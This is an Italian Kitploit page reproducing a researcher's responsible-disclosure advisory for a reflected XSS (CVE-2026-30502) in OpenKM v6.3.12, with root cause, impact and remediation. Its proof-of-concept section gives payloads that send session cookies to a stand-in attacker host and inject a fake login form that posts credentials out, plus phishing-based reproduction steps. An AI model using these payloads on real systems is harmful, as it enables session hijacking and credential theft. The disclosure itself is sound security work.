Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS | Kitploit
Strumenti/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Strumenti di PhishingAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2 mesi faNon ancora revisionato

🛡️ CVE-2026-30502 — XSS riflesso in OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Scoperta e segnalata da Dharmendra Kumar — Ricercatore di Sicurezza

Cybersecurity | Penetration Testing | Ricerca di Vulnerabilità | Divulgazione Responsabile


📌 Sommario

  • Panoramica
  • Dettagli CVE
  • Prodotto Interessato
  • Descrizione della Vulnerabilità
  • Analisi della Causa Principale
  • Impatto e Valutazione del Rischio
  • Proof of Concept (PoC)
  • Rimedio e Raccomandazioni
  • Cronologia della Divulgazione
  • Riferimenti
  • Informazioni sul Ricercatore

🔍 Panoramica

Questo repository documenta la divulgazione responsabile di CVE-2026-30502, una vulnerabilità di Cross-Site Scripting (XSS) riflesso identificata in OpenKM v6.3.12 — un sistema di gestione documentale open source ampiamente diffuso, utilizzato in ambienti enterprise e governativi.

La vulnerabilità risiede nel parametro Content, che riflette l'input fornito dall'utente nel browser senza un'adeguata sanificazione o codifica dell'output. Un attaccante può creare un URL malizioso contenente JavaScript incorporato e indurre tramite social engineering una vittima a cliccarci sopra, causando l'esecuzione di script nella sessione del browser della vittima.

⚠️ Gravità: Media–Alta | Vettore di attacco: Rete | Privilegi richiesti: Nessuno | Interazione dell'utente: Richiesta


📋 Dettagli CVE


📦 Prodotto Interessato

OpenKM è un sistema di gestione documentale (DMS) gratuito e open source che fornisce un'interfaccia web per gestire, verificare e distribuire documenti aziendali. È utilizzato da aziende, enti governativi e istituzioni educative in tutto il mondo.

  • Nome del prodotto: OpenKM Document Management System
  • Versione interessata: v6.3.12
  • Sito web del fornitore: https://www.openkm.com
  • Categoria: Sistema di gestione documentale (DMS)
  • Linguaggio / Stack: Java (JSP / Spring Framework)

🧨 Descrizione della Vulnerabilità

È stata identificata una vulnerabilità di Cross-Site Scripting (XSS) riflesso in OpenKM v6.3.12 tramite il parametro Content. L'applicazione non valida né codifica l'input fornito dall'utente prima di rifletterlo nel corpo della risposta HTTP, consentendo l'iniezione e l'esecuzione di JavaScript arbitrario nel browser della vittima.

A differenza dello Stored XSS, il payload di un XSS riflesso non viene persistito nel database — viaggia invece all'interno di un URL appositamente creato. L'attacco si basa sull'induzione della vittima a cliccare un link malizioso (distribuito via email, social media o campagne di phishing), dopo di che il payload viene eseguito silenziosamente nel browser con il contesto di sessione della vittima.

Flusso dell'Attacco

root@kitploit:~
Attacker crafts malicious URL
        │
        ▼
Victim clicks the link (phishing / social engineering)
        │
        ▼
Browser sends GET/POST request with payload in `Content` parameter
        │
        ▼
OpenKM reflects unsanitized input directly into HTML response
        │
        ▼
Browser parses & executes injected JavaScript
        │
        ▼
Session hijacked / credentials harvested / account compromised

🔬 Analisi della Causa Principale

La vulnerabilità deriva dal mancato rispetto da parte dell'applicazione dei controlli di sicurezza input-output sul parametro Content:

root@kitploit:~
User-Crafted URL ──► Content Parameter ──► [NO Validation]
       ──► Reflected in HTML Response ──► [NO Encoding]
              ──► Browser Executes Script ──► Account Compromised

💥 Impatto e Valutazione del Rischio

Lo sfruttamento riuscito di questa vulnerabilità può portare a:


🧪 Proof of Concept (PoC)

⚠️ Disclaimer: Le seguenti informazioni sono condivise esclusivamente a scopo educativo e di ricerca sulla sicurezza, nel rispetto dei principi della divulgazione responsabile. Non testare o utilizzare quanto descritto su sistemi che non possiedi o per i quali non hai ricevuto un'esplicita autorizzazione scritta.

Esempi di Payload (Generici)

root@kitploit:~
// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Credential phishing overlay
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

Struttura dell'URL Malizioso Creato

root@kitploit:~
https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

Passaggi per la Riproduzione

  1. Identificare l'endpoint vulnerabile in OpenKM v6.3.12 che riflette il parametro Content
  2. Creare un URL aggiungendo un payload XSS al parametro Content
  3. Codificare il payload in URL se necessario
  4. Inviare il link creato a una vittima tramite email, chat o qualsiasi vettore di social engineering
  5. Quando la vittima apre il link nella propria sessione autenticata del browser, il payload viene eseguito
  6. Osservare l'esecuzione di JavaScript, il furto di cookie o il comportamento di reindirizzamento

🛠️ Rimedio e Raccomandazioni

Per Sviluppatori / Fornitori

Per Amministratori di Sistema

  • 🔒 Limitare l'accesso a OpenKM a reti interne/fidate tramite regole firewall
  • 🛡️ Distribuire un Web Application Firewall (WAF) con firme di rilevamento XSS come controllo di compensazione
  • 📊 Monitorare i log di accesso del web server per rilevare tag script inaspettati o payload codificati nelle query string
  • 🔄 Mantenere l'installazione di OpenKM aggiornata all'ultima release sicura
  • 📧 Formare gli utenti a prestare attenzione quando fanno clic su link non richiesti al DMS

📅 Cronologia della Divulgazione

In questo processo sono stati seguiti pienamente i principi della divulgazione responsabile, inclusi il coordinamento con il fornitore e il coinvolgimento del CVE Program prima di qualsiasi rilascio pubblico.


📚 Riferimenti

  • 🔗 Voce MITRE CVE — CVE-2026-30502
  • 🔗 NVD — Database Nazionale delle Vulnerabilità
  • 🔗 Sito web ufficiale di OpenKM
  • 🔗 OWASP Cheat Sheet per la Prevenzione degli XSS
  • 🔗 CWE-79: Cross-site Scripting
  • 🔗 OWASP Top 10 — A03:2021 Injection
  • 🔗 OWASP Java Encoder

👨‍💻 Informazioni sul Ricercatore

Dharmendra Kumar

Ricercatore di Sicurezza | Penetration Tester | Bug Hunter | Contributore CVE

Dharmendra Kumar è un ricercatore indipendente di cybersecurity specializzato in sicurezza delle applicazioni web, penetration testing e divulgazione responsabile delle vulnerabilità. La sua ricerca si concentra sull'identificazione e sulla segnalazione responsabile di difetti di sicurezza reali in software ampiamente utilizzati — contribuendo a rendere le applicazioni più sicure per gli utenti in tutto il mondo.

Aree di Competenza:

  • 🌐 Penetration Testing di Applicazioni Web
  • 🐛 Bug Bounty Hunting e Ricerca CVE
  • 🔍 Scoperta di Vulnerabilità e Advisory di Sicurezza
  • 📋 Divulgazione Responsabile e Segnalazione Coordinata di CVE

Contattami:

GitHub LinkedIn Twitter Instagram Medium


⚖️ Disclaimer Legale

Questo repository è inteso esclusivamente a scopo educativo e informativo. I dettagli della vulnerabilità e i payload proof-of-concept sono pubblicati in conformità ai principi della divulgazione responsabile. L'autore non approva né si assume alcuna responsabilità per l'uso non autorizzato di queste informazioni. Ottenere sempre un'autorizzazione scritta esplicita prima di condurre test di sicurezza su qualsiasi sistema che non si possiede.


🙏 Ringraziamenti

Un ringraziamento speciale a:

  • Il team di sviluppo di OpenKM per la cooperazione e la reattività durante la divulgazione coordinata
  • Il MITRE CVE Program per l'assegnazione e la gestione dell'identificativo CVE
  • La comunità globale della ricerca sulla sicurezza e del bug bounty per aver continuamente alzato l'asticella della sicurezza delle applicazioni

⭐ Se questa ricerca ti è stata utile, considera di mettere una stella a questo repository.

Ricerca sulla sicurezza condivisa apertamente per rendere il web più sicuro per tutti.

© 2026 Dharmendra Kumar — Tutti i diritti riservati

Scarica lo strumento
CampoDettagli
ID CVECVE-2026-30502
ProdottoOpenKM
Versione interessatav6.3.12
Classe di vulnerabilitàCross-Site Scripting riflesso (XSS)
Parametro vulnerabileContent
CWECWE-79: Neutralizzazione impropria dell'input durante la generazione di pagine web
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
GravitàMedia–Alta
EditoreMITRE CVE Program
RicercatoreDharmendra Kumar
Tipo di divulgazioneResponsabile / Coordinata
DebolezzaDescrizione
❌ Nessuna validazione dell'inputIl parametro Content accetta caratteri HTML/JavaScript grezzi senza restrizioni o filtri
❌ Nessuna codifica dell'outputI valori riflessi vengono scritti nella risposta HTML senza codifica delle entità HTML
❌ Header CSP mancanteNessuna Content Security Policy viene applicata per bloccare l'esecuzione di script inline
❌ Nessun cookie HTTPOnlyI token di sessione sono accessibili via JavaScript, consentendo il furto diretto dei cookie
RischioDescrizione
🍪 Dirottamento della sessioneRubare i token di sessione attivi tramite document.cookie per impersonare la vittima
🔑 Raccolta di credenzialiIniettare overlay di login falsi per catturare nomi utente e password in chiaro
📤 Divulgazione di informazioniEsfiltrare contenuti documentali sensibili, dati utente o configurazioni interne
🎣 Attacchi di phishingServire pagine false convincenti ospitate all'interno del dominio fidato di OpenKM
👤 Compromissione dell'accountEseguire azioni autenticate arbitrarie per conto della vittima
⚙️ Azioni non autorizzateModificare, eliminare o esfiltrare documenti all'interno del DMS
🖥️ Distribuzione di malwareReindirizzare le vittime a siti controllati dall'attaccante che ospitano download maliziosi
RaccomandazioneImplementazione
✅ Validazione dell'inputRifiutare o rimuovere i caratteri speciali HTML (<, >, ", ', ;) da tutti i parametri controllati dall'utente
✅ Codifica dell'outputApplicare una codifica HTML sensibile al contesto utilizzando librerie come OWASP Java Encoder prima di visualizzare i dati riflessi
✅ Content Security PolicyDistribuire un header CSP rigoroso: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ Cookie HTTPOnlyImpostare i flag HttpOnly e Secure su tutti i cookie di sessione per bloccare l'accesso da JavaScript
✅ Librerie di sicurezzaIntegrare OWASP AntiSamy o DOMPurify per una sanificazione robusta
✅ AggiornamentoApplicare immediatamente l'ultima patch di sicurezza rilasciata dal fornitore
DataEvento
🔍 ScopertaVulnerabilità identificata durante la valutazione della sicurezza di OpenKM v6.3.12
📧 Notifica al fornitoreReport di divulgazione responsabile inviato al team di sicurezza di OpenKM
🤝 Conferma del fornitoreIl team di OpenKM ha confermato il report della vulnerabilità
📝 Assegnazione CVECVE-2026-30502 assegnato tramite il MITRE CVE Program
🌐 Divulgazione pubblicaDivulgazione pubblica coordinata dopo il periodo di rimedio